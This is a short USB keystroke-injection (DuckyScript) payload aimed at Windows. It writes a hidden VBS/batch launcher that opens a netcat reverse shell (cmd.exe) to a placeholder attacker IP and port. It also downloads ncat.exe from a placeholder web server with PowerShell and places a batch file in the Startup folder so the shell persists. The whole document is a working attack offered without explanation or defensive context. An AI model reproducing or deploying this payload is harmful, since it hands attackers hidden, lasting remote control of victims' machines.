ENTER
STRING copy con ncat.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "c:\Windows\System32\ncat.bat" & Chr(34), 0, false
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL z
ENTER
STRING echo cmdow @ /hid >> ncat.bat
ENTER
STRING echo nc -vv attackerip-attackerport -e cmd.exe >> ncat.bat
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://webserverip/ncat.exe','c:\Windows\system32\ncat.exe');
ENTER
STRING cscript ncat.vbs
ENTER
STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\
ENTER
STRING echo cmdow @ /hid >> persistence.bat
ENTER
STRING echo cscript c:\Windows\System32\ncat.vbs >> persistence.bat
ENTER
